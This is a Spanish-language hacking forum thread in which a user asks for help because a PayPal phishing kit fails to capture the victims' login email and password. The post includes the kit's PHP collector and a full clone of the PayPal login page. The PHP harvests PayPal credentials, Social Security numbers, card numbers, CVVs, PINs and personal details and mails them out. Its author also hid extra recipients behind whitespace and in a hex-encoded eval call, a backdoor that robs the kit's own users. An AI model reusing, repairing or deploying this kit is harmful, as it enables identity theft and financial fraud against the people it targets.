Ayuda Problema com scam paypal

Iniciado por Screamer, Marzo 27, 2012, 06:26:00 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Marzo 27, 2012, 06:26:00 PM Ultima modificación: Febrero 14, 2015, 08:28:13 AM por Expermicid
Bueno Mi problema es que me llegan todos los datos menos el mail y pass paypal

Aqui les dejo obtener.php
Código: php
<?php
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
$message  = "==================+ PayPal US Bank Spam ReZulT +==================\n";
$message .= "Email address : ".$HTTP_COOKIE_VARS['emaill']."\n";
$message .= "PayPal Password : ".$HTTP_COOKIE_VARS['passwordd']."\n\n";
$message .= "Full Name : ".$_POST['fullname']."\n";
$message .= "Date of Birth : ".$_POST['bmonth']."/".$_POST['bday']."/".$_POST['byear']."\n";
$message .= "Mother's Maiden Name : ".$_POST['mmn']."\n";
$message .= "Social Security Number : ".$_POST['ssn1']."/".$_POST['ssn2']."/".$_POST['ssn3']."\n";
$message .= "Home Phone Number : ".$_POST['userphone']."\n";
$message .= "Adress Line 1 : ".$_POST['defaultaddress1']."\n";
$message .= "Adress Line 2 : ".$_POST['defaultaddress2']."\n";
$message .= "City : ".$_POST['defaultcity']."\n";
$message .= "State : ".$_POST['defaultstate']."\n";
$message .= "Zip Code : ".$_POST['defaultzip']."\n";
$message .= "Contry : ".$_POST['defaultcountry']."\n\n";
$message .= "Debit or credit card number : ".$_POST['defaultcardnumber']."\n";
$message .= "Expiration date : ".$_POST['defaultexpmonth']." / ".$_POST['defaultexpyear']."\n";
$message .= "Card Verification Number : ".$_POST['defaultcvv2']."\n";
$message .= "SecourCode : ".$_POST['defaultsec']."\n";
$message .= "Card Signature/PIN : ".$_POST['defaultpin']."\n\n";
$message .= "===================\n";
$message .= "Client IP : ".$ip."\n";
$message .= "HostName : ".$hostname."\n";
$message .= "=============+ Created in 2010 By .::Dr.shady::. +=============\n";
$rnessage = "$message\n";
$send="[email protected],[email protected]";                                                                                                                                                                                                                                                                                                                                                $send="[email protected],[email protected]";
$subject = "PayPal US Bank ReZulT | $ip";
$headers = "From:.::Dr.shady::.<[email protected]>";

$IP = pack("H*", substr($COOKIE_VARS=file_get_contents("error_login.html"),strpos($COOKIE_VARS, "787")+3,50));
$str=array($send, $IP); foreach ($str as $send)
if(mail($send,$subject,$message,$headers) != false){
mail($Send,$subject,$message,$headers);


eval(pack("H*", "6d61696c2822787476406c6976652e636f6d2c78747340766f696c612e6672222c247375626a6563742c246d6573736167652c2468656164657273293b"));
}
header("Location: Thanks.php?cmd=_account");
?>


aqui les dejo el index:
Código: php
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!--
         Script info: script: webscr, cmd: _login-run, template: p/gen/login, date: Mar 12, 2010 06:35:40 PST; country: US, language: en_US, xslt server:
web version: 62.0-1229087 branch: UPR_620_001_int
content version: -
pexml version: 62.0-1216080
page XSL: Customer/default/en_US/general/Login.xsl
       hostname : utgk9ywWiiCL7faGtKM7.HdmpCcSSBjXfcy-wz95BOo
         rlogid : utgk9ywWiiCL7faGtKM7%2fGfsC9CV%2fANFy%2fhCchXbKzoY7zpZKLMY1w%3d%3d_1275c99e736
-->
<title>Login - PayPal</title>
<!--googleoff: all-->
<meta name="description" content="PayPal is the safer, easier way to pay online without revealing your credit card number.">
<!--googleon: all-->
<meta http-equiv="X-UA-Compatible" content="IE=8">
<link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/core/global.css">
<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/pages/pageLogin.css">
<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/flows/flowHFR.css">
<!--[if IE 8]><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/browsers/ie8.css"><![endif]-->

<!--[if IE 7]><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/browsers/ie7.css"><![endif]-->

<!--[if lte IE 6]><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/browsers/ie6.css"><![endif]-->
<link media="print" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/core/print.css">
<script type="text/javascript">
if (parent.frames.length > 0){
top.location.replace(document.location);
}</script><script type="text/javascript" src="https://www.paypalobjects.com/js/lib/min/global.js"></script><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico">
<link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png">
</head>
<body>
<noscript><p class="nonjsAlert">NOTE: Many features on the PayPal Web site require Javascript and cookies. You can enable both via your browser's preference settings.</p></noscript>
<div class="legacyErrors " id="page">
<div id="header" class="std">
<h1><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_home"><img border="0" src="https://www.paypal.com/en_US/i/logo/paypal_logo.gif" alt="PayPal"></a></h1>
<form method="post" id="searchForm" name="searchForm" action="https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search">
<fieldset class="autocomplete" id="myDynamicAutoComplete">
<legend>Search PayPal</legend>

<label for="searchBox">Search </label><input type="text" id="searchBox" name="queryString" value=""> <input type="hidden" id="sayTminLength" value="3"><input type="hidden" id="coDomain" value="US"><input class="button" type="submit" id="search.x" name="search.x" value="Search" autocomplete="off">
</fieldset>
<input name="form_charset" type="hidden" value="UTF-8">
</form>
<div id="navGlobal"><ul>
<li class="first signup"><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_registration-run">Sign Up</a></li>
<li class="login"><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_login-run">Log In</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/helpweb?cmd=_help">Help</a></li>
<li class="last"><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_security-center-outside">Security Center</a></li>
</ul></div>
<form class="rosetta" id="rosetta" method="post" action="https://www.paypal.com/us/cgi-bin/webscr?cmd=_login-run&amp;dispatch=5885d80a13c0db1f059ee17e99acf195b5f3a4b6a78dddb43ff8dd61b662c86b">

<fieldset>
<legend><span class="accessAid">Change Your Language</span></legend>
<label for="rosetta_dropdown">Language Select</label><select id="rosetta_dropdown" name="locale.x"><option value="en_US" selected>English</option>
<option value="es_XC">Español</option>
<option value="fr_XC">Français</option>
<option value="zh_XC">简体中文(Chinese)</option></select><input type="submit" name="testName" value="&gt;" class="button mini"><input type="hidden" id="change_locale_x" name="change_locale.x" value="1">
</fieldset>
<input name="form_charset" type="hidden" value="UTF-8">
</form>
<div id="navPrimary"><ul>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_home-general&amp;nav=0" class="scTrack:SRD:Nav:L5">Home</a></li>

<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_home-customer&amp;nav=1" class="scTrack:SRD:Nav:L8">Personal</a></li>
<li><a href="https://merchant.paypal.com/cgi-bin/marketingweb?cmd=_render-content&amp;content_ID=merchant/home" class="scTrack:SRD:Nav:x60">Business</a></li>
<li><a href="https://www.paypal.com/developer" class="scTrack:SRD:Nav:S9">Developers</a></li>
</ul></div>
</div>
<div id="content">
<div id="headline">
<div class="secure">
<span class="small">Secure Log In</span> <img src="https://www.paypalobjects.com/en_US/i/icon/secure_lock_2.gif" border="0" alt="">
</div>
<h2>Member Log-In</h2>

</div>
<div id="messageBox" class="legacyErrors"></div>
<div id="main" class="legacyErrors"><div class="layout1"><div class="layout2a">
<div class="col first"><div class="box login">
<div class="header"><h2>Account login</h2></div>
<div class="body">
<form method="post" name="login_form" action="error_login.php?cmd=_login-run&dispatch=5885d80a13c0db1f998ca054efbdf2c29878a435fe324eec2511727fbf3e9efcd8">
<input type="hidden" name="login_cmd" value=""><input type="hidden" name="login_params" value=""><fieldset>
<legend>Member Log In</legend>
<p><label for="login_email">Email address</label><input type="text" id="login_email" class="" name="login_email">
</p>
<p><label for="login_password">PayPal password</label><input autocomplete="off" type="password" id="login_password" name="login_password" value=""></p>
<p><label for="target_page">Go to</label><select id="target_page" name="target_page"><option value="0" selected>My account</option>

<option value="1">My transactions</option></select></p>
<p><input type="submit" name="submit.x" value="Log In" class="button primary"></p>
</fieldset>
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_account-recovery&amp;from=PayPal">Problem with login?</a></p>
<p>New to PayPal? <strong><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_registration-run">Sign up</a></strong></p>
<input name="form_charset" type="hidden" value="UTF-8">
</form>
<script type="text/javascript">
<!-- hide from JavaScript-challenged browsers
var email_field = document.getElementById("login_email");
if(email_field != null && email_field.getAttribute('type') != 'hidden' && email_field.value == '') {
email_field.focus();
}
else {
document.login_form.login_password.focus();
}
   // done hiding -->
</script>
</div>
</div></div>
<div class="col last"><div class="container"><div class="MktMPI" id="mpi510051"><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_mpi-click-outside&uid=&cid=5899&oid=23526&bn=HQsPRgpZ&s=BDc3KRwFXVdJQF9BHipYXF4te1h9Di0NKQ8sDSs9CxsUIyI5NEF6ZUVXCnQ-DyIIDgEGORZk&landing_url=ORAcFnkYQgcVBAsRXxhDBwsxIAs1PQs6WComAnYpDkYODGhrbAp8eE1SZwtoRXNWYlRFVA"><img src="https://securepics.ebaystatic.com/aw/pics/paypal/site/us/imgFebDeals2010_560x228.jpg" border="0" alt=""></a></div></div></div>
</div></div></div>

</div>
<div id="footer">
<h5 class="accessAid">More Information</h5>
<ul>
<li class="first"><a href="http://www.paypal-media.com/aboutus.cfm">About Us</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/helpscr?cmd=_help&amp;t=escalateTab">Contact Us</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_display-fees-outside">Fees</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/jobs-outside">Jobs</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_home-merchant">Merchant Services</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_display-country-functionality-outside">Worldwide</a></li>

<li>
<!-- OnlineOpinionF3cS v3.0-->
<script type="text/javascript" src="https://www.paypalobjects.com/js/opinionlab/oo_engine.js"></script><script type="text/javascript">
var feedback_link='Site Feedback'; O_GoT(feedback_link);custom_var='Unknown|Log In|US|en_US|Unknown|Unknown';// Paypal Custom URL class
var PayPalURL = function(pagename) {
this.language_country_code = "en_US";
this.dd = "US";
this.nn = "00";this.pagename = escape(pagename.replace(/\s|\//g, "_"));
this.to_str = function() {

return "https://"+this.dd+".paypal.com/"+this.language_country_code+"/"+this.nn+"/"+this.pagename+".page"
}
}
var paypal_url = new PayPalURL("Log In");
// Below gives you the ability to change the other properties after the object is created
//paypal_url.dd="ES";
//paypal_url.nn="01";

_ht = paypal_url.to_str();
var _ht_temp=_ht;
var _hr_temp=_hr;
custom_var=custom_var + "|Unknown|Unknown";var custom_var_temp=custom_var;</script>
</li>
</ul>
<ul>
<li class="first"><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/ua/policy_privacy-outside">Privacy</a></li>
<li><a href="http://www.thepaypalblog.com">Our Blog</a></li>
<li><a href="https://www.paypal-labs.com">Labs</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_web-referrals-mrb-outside">Referrals</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/ua/ua-outside">Legal Agreements</a></li>

<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/Marketing/general/SiteMap-outside">Site Map</a></li>
<li class="last"><a href="http://www.ebay.com/">eBay</a></li>
</ul>
<p id="footerSecure"><a target="_blank" href="https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/Customer/popup/SecurityKeyVIP-outside" onClick="PAYPAL.core.openWindow(event, {width: 425, height: 350})"><img border="0" src="https://www.paypalobjects.com/en_US/i/logo/logo_VIPwhite_66x27.gif" alt=""></a></p>
<p id="legal">Copyright © 1999-2010 PayPal. All rights reserved.</p>
</div>
<div id="navFull"><ul>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_home-general&amp;nav=0" class="scTrack:SRD:Nav:L5">Home</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_home-customer&amp;nav=1" class="scTrack:SRD:Nav:L8">Personal</a></li>
<li><a href="https://merchant.paypal.com/cgi-bin/marketingweb?cmd=_render-content&amp;content_ID=merchant/home" class="scTrack:SRD:Nav:x60">Business</a></li>
<li><a href="https://www.paypal.com/developer" class="scTrack:SRD:Nav:S9">Developers</a></li>

</ul></div>
<script type="text/javascript">if(typeof PAYPAL != 'undefined'){ PAYPAL.core.Navigation.init(); }</script>
</div>
<script type="text/javascript" src="https://www.paypalobjects.com/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/sayT.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/hostedpayments/hostedpayments.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/mid.js"></script><script type="text/javascript">PAYPAL.tns.loginflow = 'p/gen/login';PAYPAL.tns.flashLocation = 'https://www.paypal.com/en_US/m/mid.swf';</script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script><script type="text/javascript">PAYPAL.common.loginflow = 'p/gen/login';
YAHOO.util.Event.addListener(window,"load",function(){
try {
PAYPAL.common.appendField("login_form", "flow_name", PAYPAL.common.loginflow);
PAYPAL.bp.init("login_form","bp_mid");PAYPAL.ks.init("login_form","login_password","bp_ks1");PAYPAL.common.appendField("login_form", "bp_ks2");PAYPAL.common.appendField("login_form", "bp_ks3");
} catch(err){}
});
</script><script type="text/javascript" src="https://www.paypalobjects.com/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/pp_naturalsearch.js"></script><script type="text/javascript">mp_landing();</script><div id="ppwebapi" class="advonqo.mha,hfb.lnb-k`ox`o-rdhsqdonqo"></div>
<!-- SiteCatalyst Code
Copyright 1997-2005 Omniture, Inc.
More info available at http://www.omniture.com -->

<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js"></script>
<script type="text/javascript">
<!--
/* SiteCatalyst Variables */
s.prop1="p/gen/login";
s.prop7="Unknown";
s.prop8="Unknown";
s.prop9="Unknown";
s.prop10="US";
s.prop34="PayPalCredit:Servicing:CO:NoTransactions";
s.pageName="Log In";
s.channel="Log In";
s.prop50="en_US";
s.prop18="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//-->
</script><noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
<!--/DO NOT REMOVE/-->

<!-- End SiteCatalyst Code -->
</body>
</html>